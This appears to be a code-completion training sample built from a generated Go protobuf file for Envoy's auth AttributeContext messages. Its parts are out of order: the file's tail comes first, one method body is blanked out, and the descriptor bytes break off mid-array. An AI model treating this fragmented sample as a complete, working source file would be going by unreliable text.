}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
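// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// The registered message round-trips through the binary wire format using
// the proto package imported above.
func exampleRoundTripSketch(in *AttributeContext) (*AttributeContext, error) {
	raw, err := proto.Marshal(in)
	if err != nil {
		return nil, err
	}
	out := &AttributeContext{}
	if err := proto.Unmarshal(raw, out); err != nil {
		return nil, err
	}
	return out, nil
}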
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| GetMetadataContext | identifier_name |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi-hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi-hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
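// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// Context extensions are opaque key/value hints set in the filter
// configuration; the comma-ok form distinguishes a missing key from an empty
// value and is safe even when the map is nil. The key name is invented.
func exampleContextExtensionSketch(ctx *AttributeContext) (string, bool) {
	v, ok := ctx.GetContextExtensions()["virtual_host"]
	return v, ok
}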
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer; this is typically the IP address.
// It can also be a UDS path, or another kind of address.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or `:authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) |
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
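// Illustrative sketch (added for clarity, not part of the generated bindings): how a
// caller in this package might populate the HTTP attributes described above. All field
// values below are made-up examples.
func exampleHttpRequestAttributes() *AttributeContext_HttpRequest {
	return &AttributeContext_HttpRequest{
		Id:       "3f1c2e9a-example",                                     // typically the X-Request-ID
		Method:   "GET",
		Headers:  map[string]string{"content-type": "application/json"}, // keys must be lower-cased
		Path:     "/status?verbose=1",                                   // path including the query string
		Host:     "backend.example.com",
		Scheme:   "https",
		Size:     -1,                                                    // -1 when the request size is unknown
		Protocol: "HTTP/1.1",
	}
}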
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
